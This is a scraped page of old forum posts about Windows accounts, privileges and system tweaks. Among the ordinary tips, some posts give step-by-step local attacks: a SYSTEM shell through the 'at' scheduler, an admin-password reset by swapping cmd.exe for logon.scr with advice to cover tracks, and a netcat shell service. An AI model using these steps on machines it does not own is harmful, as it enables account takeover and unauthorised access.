Loading...
|
|
Posted in Computers & Tech / Operating Systems / Windows (All Versions)
Author: yordan Total-Replies: 7 As far as I remember, when installing XP home edition, you create a user (let's say "Daddy" or "Issa"), you give this user a password, and only the users you create can log in. The first user you create is an admin, and you should not forget his password. If you forgot the user's password, you will probably have to re-install windows. I'm even not sure that the Administrator user can connect, at least you should give him a password and look if his account is not locked.
Wed Mar 18, 2009
Reply New Discussion
Posted in Computers & Tech / Operating Systems / Windows (All Versions)
Author: BlazeFiend Total-Replies: 13 Ok, here's my problem, me and my older brother share a PC, we're both administrators, but he turned my account into a standard user and wont change it back. So how can I change myself back into an administrator? btw, we hve Windows Vista.
Thu Apr 23, 2009
Reply New Discussion
Posted in Computers & Tech / What's New...?
Author: ruijie Total-Replies: 7 Running the Windows Scheduler from a command prompt can elevate a user's rights. 1. Type command in the Run box. 2. Type at (timeafter1minhere) /interactive cmd.exe (For Example: The SYSTEM CLOCK shows 8:42PM. I would type the time in the 24 hr format, like this: at 20:43 /interactive cmd.exe 3. When the system clock goes to the next minute, another command prompt will appear. Don't Close/Close the first command prompt and open up the task manager. Go to the processes tab, click on explorer.exe and end that process. The taskbar and desktop will disappear. Do not panic! This is normal. 4. Type explorer.exe in the second command prompt. When you start any programs, you will be shown that you are currently logged in as NT AUTHORITY\SYSTEM when you click on processes tab in taskmanager or click on the start button. Now you have higher rights than administrator! EDIT: Take note of STEP 3. Do NOT close the first command prompt if you want your original account back quickly. You should be able to get back your original account after restarting your computer unless you did something wrong. Getting your account back without restarting your computer: Don't close the first command prompt. After messing around with your System account, open task manager again, end explorer.exe and then go to the first command prompt. Type explorer.exe, which launches the shell. Your login name should now be changed to your original name, instead of System. The reason is that the 1st command prompt is still running under your name, because you started it before you have changed your account name to System. When you run explorer.exe, it follows the user who started the command prompt. If you closed the command prompt, just restart your computer to get back to your original user account.
Tue Nov 7, 2006
Reply New Discussion
Posted in Astahost / Hosted Members Support / Misc. Issues with no other for..
Author: HellFire121 Total-Replies: 5 Hi i'm just wondering if it's possible to have another user login to phpmyadmin without sharing my cpanel username and password. The other user is one of the devs on my site and needs mysql access. I can run the commands for him when i am there but when i'm not there what we are working on can get delayed. So basically, can there be more than one user (with different usernames/passwords) login to phpmyadmin without going through cpanel Thanks -HellFire
Mon Jan 22, 2007
Reply New Discussion
Posted in Computers & Tech / Operating Systems / Windows (All Versions)
Author: yordan Total-Replies: 6 Very nice trick, thanks a lot. I will try this next time I will be a non-admin user on a vista system. By the way, you posted this in the tutorial section. Please remember the first specification for a tutorial, as expressed here : http://www.astahost.com/how-s-tutorials-f6.html QUOTE1. The Tutorials have to be of a bare minimum length of 500 words to be accepted.Your text is far below this 500 words threshold. That's why I moved it here, where is most probably it's place. Regards Yordan
Tue Oct 21, 2008
Reply New Discussion
Posted in Computers & Tech / Operating Systems / Windows (All Versions)
Author: aguy Total-Replies: 8 Hi, I need to copy files from a windows 7 laptop. I don't have the password for the machine. There is only one user account. Reinstalling the OS or recovery mode is not an option. Is there any way I can retrieve the files on a USB? I am thinking if I can get to the command prompt during bootup and if it recognizes the USB, I might be able to copy some of the files at least. Do you think this will work? What could be another option? Sorry, quite lost here.Will appreciate any help. Thanks, John
Fri May 14, 2010
Reply New Discussion
Posted in Computers & Tech / Operating Systems / Windows (All Versions)
Author: FeedBacker Total-Replies: 22 i want to hack to become administrator Administrator Account Problem In Microsoft Xp [solved] When I go to user accounts everytghing is blocked so I can do nothing what should I do -mark
Thu Feb 14, 2008
Reply New Discussion
Posted in Computers & Tech / Operating Systems / Windows (All Versions)
Author: (G)kardiva Total-Replies: 21 Toi get time stamp in th txt file created by CMD.Command Prompt Tips I run a command to map another system. net use xx.Xxx.Xx.Xxx /user:abcd abcd123@ >> log.Txt From this iget "The command completed successfully." in the txt file however it want the time this command was executed do that I can keep a track on the same. something like " May 09 2009 10:00:12 Am : The command completed successfully." Kinldy help me if we can achive this. Thanks in advance. Kardiva
Sat May 9, 2009
Reply New Discussion
Posted in Computers & Tech / Operating Systems / GNU/Linux
Author: FirefoxRocks Total-Replies: 4 I know that Linux is much more customizable than Windows regarding the system and kernel itself. Now in my other post, I wanted to find out if I can trigger the UAC prompt for certain tasks. Since doing so is nearly impossible or would be very difficult or illegal according to Microsoft's End User License Agreement, I was hoping that this task could be achieved in Linux. I am running Ubuntu 7.10 with the GNOME Desktop environment. Now normally, I would need to type in my password to open things like Login Window, Network Manager, GNOME Partition Editor and things like that. How I would like to know if I can force the sudo prompt on the following tasks without executing the application as root!:
If I can't get it on every one of the above tasks, I'll do as much as possible. I know that I can always be forced to enter my password by launching things via sudo in the terminal window. The thing is, I do not want to launch certain programs as root for obvious reasons, and certain applications shouldn't be run under root (e.g. Wine applications).And also, I want to see the graphical interface. is there a way to achieve this behaviour on Linux?
Wed Aug 27, 2008
Reply New Discussion
Posted in Computers & Tech / How-To's and Tutorials / OS / Windows
Author: harriko Total-Replies: 23 In this tutorial i will show ou how to hide your documents or folders, but you have to remember where it is! ok lets go! pick a file you want to hide from windows XP, to help you i will hide a file "hidden.doc" in "C:" open command prompt: START>RUN>CMD you might find yourself in your user directory. in the command prompt go into the directory of where your file is going to be hidden. as my "hidden.doc" is in "C:" i will use "cd.." command to "change directory before" till i get into my C: drive once your there use the attributes command on the file you are hiding. this is what you put into the command prompt. CODEattrib +r +a +s +h hidden.docreplace the hidden.doc with your own file. hope you find this useful!
Tue Feb 15, 2005
Reply New Discussion
Posted in Computers & Tech / How-To's and Tutorials / OS / Windows
Author: FirefoxRocks Total-Replies: 1 How to enable User Secure Login on Windows Vista You may have worked in a business, educational or other network that uses Windows to log in. With or without being on a domain, most business environments "require" you to press the key combination of CTRL + ALT + DELETE prior to the log on prompt (the username, password and domain box). This is supposed to enhance login security to verify the authenticity of the login box (so that no other malicious software makes a similar box). This tutorial will show you how to enable this functionality on Windows XP Home Edition and Windows Vista Home Premium. This may work on Windows Vista Home Basic and/or Windows XP Media Center Edition but they haven't been tested so I can't guarantee anything. For Windows Vista Business, Windows XP Professional, Windows Vista Ultimate, again, these instructions may work, I haven't tested them out, but you can likely enable it via the Control Panel applet or by using Group Policy Editor. Windows XP Home Edition:
Windows Vista Home Premium:
Note that in both Windows XP and Windows Vista, this also affects when you Lock Computer/Switch User. You must press Ctrl+Alt+Delete in the Unlock Computer dialog also. Hope this helps!!
Thu Nov 6, 2008
New Discussion
Posted in Computers & Tech / Security issues & Exploits
Author: XPkiller Total-Replies: 15 QUOTEWINDOWS TIPS COLLECTION How to hack windows XP admin password If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly: cd\ *drops to root cd\windows\system32 *directs to the system32 dir mkdir temphack *creates the folder temphack copy logon.scr temphack\logon.scr *backsup logon.scr copy cmd.exe temphack\cmd.exe *backsup cmd.exe del logon.scr *deletes original logon.scr rename cmd.exe logon.scr *renames cmd.exe to logon.scr exit *quits dos Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP. Once this happens if you enter this command minus the quotes "net user <admin account name here> password" If the Administrator Account is called Frank and you want the password blah enter this "net user Frank blah" and this changes the password on franks machine to blah and your in. Have fun p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks Registry Hacking Display legal notice on startup: Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up. REGEDIT [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]"legalnoticecaption"="enter your notice caption" "legalnoticetext"="enter your legal notice text" Automatic Administrator Login: Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account. REGEDIT 4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "AutoAdminLogon"="1" No Shutdown: Wanna play with your friends by removing the shutdown option from start menu in their computer. Just hack it down !!! Regedit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer "NoClose"="DWORD:1" Menu Delays: Another minor and easy tweak to remove any delay from menus sliding out. For this you will need to use regedit (open regedit by going to Start -> Run..., then typing 'regedit' and pressing enter). The key you need to change is located in HKEY_CURRENT_USERControl PanelDesktop. The actual key is called MenuShowDelay - all you have to do is change the value to 0. Remember, you will have to re-boot your computer for this tweak to take effect. GPEDIT.MSC And Autoplay A great tweaking file that comes with XP is gpedit.msc. Go to Start -> Run... and then type in 'gpedit.msc' and press enter. This is effectively the Policies Editor, and it comes in handy often. For example, if you hate CD autoplay like I do and want to permanently disable it, you can use this tool to do so. Just run gpedit.msc, then go to Computer Configuration -> Administrative Templates -> System. In here you can see the value 'Turn Off Autoplay'. Right-click on it and then click 'Properties'. Increasing options in add/remove programs: Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this: [Components] NtComponents=ntoc.dll,NtOcSetupProc,,4 WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7 Display=desk.cpl,DisplayOcSetupProc,,7 Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7 NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7 iis=iis.dll,OcEntry,iis.inf,,7 com=comsetup.dll,OcEntry,comnt5.inf,hide,7 dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7 IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7 TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2 msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6 ims=imsinsnt.dll,OcEntry,ims.inf,,7 fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7 AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7 msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7 RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7 IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7 This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so: msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7 To this: msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7 Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",". Automatically Kill Programs At Shutdown: don't you hate it when, while trying to shut down, you get message boxes telling you that a program is still running? Making it so that Windows automatically kills applications running is a snap. Simply navigate to the HKEY_CURRENT_USERControl PanelDesktop directory in the Registry, then alter the key AutoEndTasks to the value 1. Speeding Up Share Viewing: This is a great tweak. Before I found it, I was always smashing my head against the table waiting to view shares on other computers. Basically, when you connect to another computer with Windows XP, it checks for any Scheduled tasks on that computer - a fairly useless task, but one that can add up to 30 seconds of waiting on the other end - not good! Fortunately, it's fairly easy to disable this process. First, navigate to HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace in the Registry. Below that, there should be a key called {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Just delete this, and after a restart, Windows will no longer check for scheduled tasks - mucho performance improvement! Create a Shortcut to Lock Your Computer Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient. Speed up Internet Explorer 6 Favorites For some reason, the Favorites menu in IE 6 seems to slow down dramatically sometimes--I've noticed this happens when you install Tweak UI 1.33, for example, and when you use the preview tip to speed up the Start menu. But here's a fix for the problem that does work, though it's unclear why: Just open a command line window (Start button -> Run -> cmd) and type sfc, then hit ENTER. This command line runs the System File Checker, which performs a number of services, all of which are completely unrelated to IE 6. But there you go: It works. Aspi WinXP does not come with an Aspi layer. So far almost 90% of the problems with WinXP and CD burning software are Aspi layer problems. After installing WinXP, before installing any CD burning software do a few things first: 1. Open up "My computer" and right click on the CD Recorder. If your CD recorder was detected as a CD recorder there will be a tab called "Recording". On this tab uncheck ALL of the boxes. apply or OK out of it and close my computer. 2. Next install the standard Aspi layer for NT. Reboot when asked. That's is. after the reboot you can install any of the currently working CD recording applications with no problems. If using CD Creator do not install direct CD or Take two as they are currently incompatible but Roxio has promised a fix as soon as XP is released.
Sat May 5, 2007
Reply New Discussion
Posted in Computers & Tech / Operating Systems / Windows (All Versions)
Author: wutske Total-Replies: 45 QUOTE (Brian)Well I was wondering, this is a nice way to get around it being blocked, but is there a way to block some of these techniques as well?Because when you block the command prompt for security reasons or whatever, it would be nice if it was actually blocked in all ways. So if somebody knows how to block these attempts I think it would be good for all to know. Also, just as a side note, doesn't this belong more in the security & exploits area? Link: view Post: 104071 no idea under wich user the command prompt is launched when doing this helpfile-trick, but changing the access rigths of cmd.exe (by denying read/write access) is the simples method, but probably not the best. The 'at' command can be blocked too. You'll probably have to start digging in the group editor to find these options.
Sun May 27, 2007
Reply New Discussion
Posted in Computers & Tech / Operating Systems / Windows (All Versions)
Author: Aditya Total-Replies: 5 [note=szupie]Copied from http://forums.aspfree.com/windows-os-15/20...-xp-102029.html[/note] QUOTEYou've read the reviews and digested the key feature enhancements and operational changes. Now it's time to delve a bit deeper and uncover some of Windows XP's secrets..1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only). 2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only). 3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same. 4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable. 5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options -- they're all far too baroque to go into here. 6. XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry and don't bother. 7. You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system. 8. XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files well alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can put things back as they were by typing 'regsvr32 zipfldr.dll'. 9. XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2. 10. You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum's real IP address -- they can find this out by going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer. 11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects. 12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.
Sun Mar 19, 2006
Reply New Discussion
Posted in Computers & Tech / Programming / Programming General / BASIC / Visual Basic (.NET)
Author: tansqrx Total-Replies: 20 I am having quite the time spawning a process under a different user context. My preferred method involves using the Windows API functions LogonUser() and CreateProcessAsUser() but I have not figured out a way to overcome several error messages. I also have the particular problem of running my program from the system account which I have found affects the behavior of CreateProcessAsUserW. Added to this toxic mix are several bugs scattered throughout the Windows API and .NET framework. After numerous attempts and about two weeks of frustrations I am open to suggestions. Background I am working on a side software project for my company that involves managing and administrating several computers in a lab. The project currently uses VB.NET 2005. One aspect of my project involves providing command line access from a lab computer to a central data collection computer. This functionality has already been accomplished by use of creating a service running under the SYSTEM account and netcat (http://netcat.sourceforge.net/). Basically what happens is when the lab computer is booted; a Windows service starts and creates a netcat session with the central computer. The central machine already has a netcat listener running so when the request comes in, an instant command prompt of the lab computer is given on the central machine. This solution has been thoroughly tested, signed off on, and works great so there can not be any changes to this part of the project. Here comes the problem. The netcat session is running under the context of SYSTEM, localsystem, or NT Authority. As some of you may know, the SYSTEM account is noninteractive and does not have access to the default desktop. Let’s take for example you wanted to start Notepad from this session. Enter the command and nothing happens. This is because SYSTEM can not access WINSTA0 and no commands with graphics or forms can be run. The next phase of our project involves running interactive programs on the desktop of any user that happens to be logged in (and perhaps those who are not). From experiments I have found that a netcat session running under the currently logged in user is able to run all GUI programs. My dilemma is creating a program that can be run under the SYSTEM service and launch a program or another netcat session with alternate credentials. As a side note, Microsoft does provide a well know utility called runas. This is of course what I would use but I have found that it will not work under a netcat session. After entering the command, the password is never asked for and it dumps me right back to the prompt. I have also tried several other third-party runas utilities such as sanur and CPAU but none of them works either. Requirements 1. Parent process running under SYSTEM context from Windows service. 2. Child process must run under alternate credentials and be able to launch a GUI application or another netcat instance. 3. Child process window must have the ability to start without a window. 4. Run under Windows XP SP2. 5. Child process should have access to the default desktop. 6. Program written in VB.NET, .NET framework 2.0. Desired but I will take anything in .NET (C#), C++, or C Methods Over the course of several weeks I have tried many different things. Here is what I have gone through. Method 1 - .NET Process Class This is the simplest way to create another process. This is not meant to create a process under another user but more of a reality check. Some interesting points are found by running the program under both a normal account (running straight from Visual Studio IDE) and the SYSTEM account. Under a normal account a DOS window briefly flashes and the program runs as expected. This is still a bug as the CreateNoWindow property is set to True and a window is still created. Under the SYSTEM account the same program starts a netcat session but never connects to the listener. Problem: No alternate credentials Method 2 - .NET Process Class Using Username, Domain, and Password .NET 2.0 added a new feature to the framework that allows programmers to spawn a process all within .NET. Just one problem, there is a bigger bug. Even if the CreateNoWindow property is set to True, a window is still created and this time it stays maximized. Under the SYSTEM account an exception is thrown “System.ComponentModel.Win32Exception: Access is denied.” According to MSDN (http://msdn2.microsoft.com/en-us/library/system.diagnostics.process.startinfo.aspx), System.Diagnostics.Process is just a wrapper for the CreateProcessWithLogonW API. As I will explain later this presents its own problems. Microsoft also mentions that even though WindowStyle=hidden and CreateNoWindow=True, a window will still be created. I have seen in other articles that this is not intentional but a bug. Problem: Exception thrown, Window in normal account. Method 3 - Windows API LogonUser and CreateProcessAsUser From everything I have read this should be the one that works no matter what but alas it does not. My primary guide to this method is by K. Scott Allen (http://odetocode.com/Blogs/scott/archive/2004/10/28/602.aspx). This method uses two API functions, LogonUser and CreateProcessAsUser. LogonUser acquires a security token from the kernel. That token is then passed to CreateProcessAsUser along with what program and arguments to run. Under a normal account I get a 1314 - ERROR_PRIVILEGE_NOT_HELD (http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/system_error_codes__1300-1699_.asp) when CreateProcessAsUser is called. When running under SYSTEM I get 1307 - ERROR_INVALID_OWNER when CreateProcessAsUser is called. Problem: 1307 under SYSTEM, 1314 under normal account. Method 4 - Windows API LogonUser, DuplicateTokenEx, and CreateProcessAsUser This is a slight change from method 3 as DuplicateTokenEx is added and is still the front runner for a finial solution. DuplicateTokenEx transforms the token retrieved from LogonUser into a primary token. Once again a 1314 is thrown under a normal account. Under the SYSTEM account a 1004 - ERROR_INVALID_FLAGS error is thrown on DuplicateTokenEx and 1307 is thrown on CreateProcessAsUser. A few interesting problems pop up when using this solution. For one, the command to launch can be passed two different ways, through lpApplicationName or lpCommandLine. MSDN says that lpApplicationName can be used to pass the command name and lpCommandLine for the arguments. You can also set lpApplicationName to nothing and pass both the command and arguments through lpCommandLine. I have tried both methods and I have not found any combination that works. Under certain variations I also get a 2 - ERROR_FILE_NOT_FOUND / 5 - ERROR_ACCESS_DENIED on LogonUser and 2 - ERROR_FILE_NOT_FOUND for CreateProcessAsUser. I have also used a known good application (notepad) and location to add to the mix and confirm the results. Once again according to MSDN documentation (http://support.microsoft.com/?id=285879) certain permissions must be set for both the calling account and alternate account. When running under SYSTEM, the calling account should have all permissions as it is the OS. Also the alternate account should have all the desired permissions because MAXIMUM_ALLOWED is set in DuplicateTokenEx. Perhaps there is another API that I must call to set these but I have not found one yet. Also there might be an API that could check the permissions? Problem: 1004, 1307, 2 under SYSTEM, 1314, 2, 5 under normal account. Method 5 - Windows API LogonUser, DuplicateTokenEx, and CreateProcessAsUserW This is the same as method 4 but uses the Unicode version of CreateProcessAsUser. I have read in several forums that this will solve the problem under Windows XP. A normal account produces a 2 - ERROR_FILE_NOT_FOUND under CreateProcessAsUserW. Under SYSTEM 1004 is thrown for DuplicateTokenEx and 2 for CreateProcessAsUser. Additionally 123 - ERROR_INVALID_NAME is thrown in some variations. Problem: 1004, 2 under SYSTEM, 2, 5 under normal account. Method 6 - Windows API CreateProcessWithLogonW This API function is new 2000, XP, and 2003 Server and combines the functions of LogonUser and CreateProcessAsUserW. From many forums, many users accomplished their goals by using CreateProcessWithLogonW. A caveat of CreateProcessWithLogonW is that it can’t be called from the SYSTEM account according to the MSDN documentation (http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dllproc/base/createprocesswithlogonw.asp) which defeats the purpose of my program. Under a normal account, the program almost makes due. A window is created (which I think I can fix by tweaking one of the lpStartupInfo properties) and a nonfatal 203 - ERROR_ENVVAR_NOT_FOUND error thrown, but it does run. Under SYSTEM a 203 is thrown but nothing happens. Problem: CreateProcessWithLogonW will not run under SYSTEM account Method 7 – The Kitchen Sink I have seen many different variations on method 4 floating around out on the Internet. This is my attempt to throw everything at the wall and see what sticks. GetProcessWindowStation, OpenWindowStation, SetProcessWindowStation, and OpenDesktop have been added to the mix. The bottom line is CreateProcessAsUser is throws a 1314 error and GetProcessWindowStation throws a 5 - ERROR_ACCESS_DENIED. Under the normal account. Under SYSTEM GetProcessWindowStation throws a 2 - ERROR_FILE_NOT_FOUND and a 1307 for CreateProcessAsUser. Problem: 2, 1307 under SYSTEM, 5, 1314 under normal account. Method 7 – .NET Impersionation I quickly saw that this was not going to work. You can set a section of code to run under differed credentials but you can not start a new process under different credentials. I figured I would just throw this one in for completeness. Problem: No alternate credentials Possible Fixes? • Perhaps the command to be processed is not formatted correctly. I have also tried a known good application (notepad) and usually get the same results. • Additional permissions must be added to the account but I don’t know what the API would be to do this. • Additional API’s needed? Conclusion It appears that everything was OK in Microsoft land until SP2 and Windows 2003 hit the market. Apparently Microsoft purposely sabotaged some of their API’s so that you can not easily spawn a process with alternate credentials from the SYSTEM account. There has to be a way of doing this, surely Microsoft didn’t paint themselves into a corner on this one. What happens if the OS wants to create a process under a different user (such as when a service is started under an account)? Sorry for such a long article but I wanted to show how completely I have researched this problem. Any constructive suggestions are welcomed with open arms and if you have a working example then I will be your new best friend. Code is provided below. I did not run each method concurrently, I simply commented out methods and tested one at a time. You may get 6 - ERROR_INVALID_HANDLE if LogonUser is called more than once. You will have to replace user/pass where needed. Full Project: http://www.ycoderscookbook.com/Files/raex.rar Code CODEOption Strict OnOption Explicit On Imports System Imports System.Runtime.InteropServices Imports System.Security.Principal Imports System.Security.Permissions Imports System.Threading <Assembly: SecurityPermissionAttribute(SecurityAction.RequestMinimum, UnmanagedCode:=True), _ Assembly: PermissionSetAttribute(SecurityAction.RequestMinimum, Name:="FullTrust")> Module raex Dim strUser As String = Nothing Dim strPassword As String = Nothing Dim strServer As String = "192.168.1.109" Dim strPort As String = "2000" Dim strApplication As String = Nothing #Region "Const" Const LOGON32_LOGON_INTERACTIVE As Integer = 2 Const LOGON32_PROVIDER_DEFAULT As Integer = 0 Const WINSTA_ALL_ACCESS As Integer = &H37F Const READ_CONTROL As Integer = &H20000 Const WRITE_DAC As Integer = &H40000 Const DESKTOP_WRITEOBJECTS As Integer = &H80 Const DESKTOP_READOBJECTS As Integer = &H1 Const GENERIC_ALL As Integer = &H10000000 Const MAXIMUM_ALLOWED As Integer = &H2000000 Const SECURITY_IMPERSONATION As Integer = 2 Const TOKEN_PRIMARY As Integer = 1 Const LOGON_NETCREDENTIALS_ONLY As Integer = &H1& Const CREATE_DEFAULT_ERROR_MODE As Integer = &H4000000 #End Region #Region "Structures" Public Structure PROCESS_INFO Public hProcess As IntPtr Public hThread As IntPtr Public dwProcessId As Integer Public dwThreadId As Integer End Structure Public Structure STARTUP_INFO Public cb As Integer Public lpReserved As Integer <MarshalAs(UnmanagedType.LPTStr)> Public lpDesktop As String <MarshalAs(UnmanagedType.LPTStr)> Public lpTitle As String Public dwX As Long Public dwY As Integer Public dwXSize As Integer Public dwYSize As Integer Public dwXCountChars As Integer Public dwYCountChars As Integer Public dwFillAttribute As Integer Public dwFlags As Integer Public wShowWindow As Short Public cbReserved2 As Short Public lpReserved2 As Integer Public hStdInput As Integer Public hStdOutput As Integer Public hStdError As Integer End Structure Public Structure SECURITY_ATTRIBUTES Public nLength As Integer Public lpSecurityDescriptor As IntPtr Public bInheritHandle As Boolean End Structure #End Region #Region "API Imports" <DllImport("C:\\Windows\\System32\\advapi32.dll")> _ Public Function CreateProcessWithLogonW(<MarshalAs(UnmanagedType.LPWStr)> ByVal lpUsername As String, _ <MarshalAs(UnmanagedType.LPWStr)> ByVal lpDomain As String, _ <MarshalAs(UnmanagedType.LPWStr)> ByVal lpPassword As String, _ ByVal dwLogonFlags As Integer, _ <MarshalAs(UnmanagedType.LPWStr)> ByVal lpApplicationName As String, _ <MarshalAs(UnmanagedType.LPWStr)> ByVal lpCommandLine As String, _ ByVal lpCreationFlags As Integer, _ ByVal lpVoid As Integer, _ <MarshalAs(UnmanagedType.LPWStr)> ByVal lpCurrentDirectory As String, _ ByRef lpStartupInfo As STARTUP_INFO, _ ByRef lpProcessInfo As PROCESS_INFO) As Integer End Function <DllImport("C:\\Windows\\System32\\advapi32.dll")> _ Public Function LogonUser(ByVal lpUsername As String, _ ByVal lpDomain As String, _ ByVal lpPassword As String, _ ByVal dwLogonType As Integer, _ ByVal dwLogonProvider As Integer, _ ByRef pToken As IntPtr) As Boolean End Function <DllImport("C:\\Windows\\System32\\user32.dll", SetLastError:=True)> _ Public Function GetProcessWindowStation() As IntPtr End Function <DllImport("C:\\Windows\\System32\\user32.dll", SetLastError:=True)> _ Public Function OpenWindowStation(ByVal lpszWinSta As String, _ ByVal fInherit As Boolean, _ ByVal dwDesiredAccess As UInteger) As IntPtr End Function <DllImport("C:\\Windows\\System32\\user32.dll", SetLastError:=True)> _ Public Function SetProcessWindowStation(ByVal hWinSta As IntPtr) As Boolean End Function <DllImport("C:\\Windows\\System32\\user32.dll", SetLastError:=True)> _ Public Function OpenDesktop(ByVal lpszDesktop As String, _ ByVal dwFlags As Integer, _ ByVal fInherit As Boolean, _ ByVal dwDesiredAccess As UInteger) As IntPtr End Function <DllImport("C:\\Windows\\System32\\advapi32.dll", SetLastError:=True)> _ Public Function ImpersonateLoggedOnUser(ByVal hToken As IntPtr) As Boolean End Function <DllImport("C:\\Windows\\System32\\advapi32.dll", SetLastError:=True)> _ Public Function CreateProcessAsUser(ByVal pToken As IntPtr, _ ByVal lpApplicationName As String, _ ByRef lpCommandLine As String, _ ByRef lpProcessAttributes As SECURITY_ATTRIBUTES, _ ByRef lpThreadAttributes As SECURITY_ATTRIBUTES, _ ByVal bInheritHandles As Boolean, _ ByVal dwCreationFlags As Integer, _ ByRef lpEnvironment As IntPtr, _ ByVal lpCurrentDirectory As String, _ ByRef lpStartupInfo As STARTUP_INFO, _ ByRef lpProcessInfo As PROCESS_INFO) As Boolean End Function 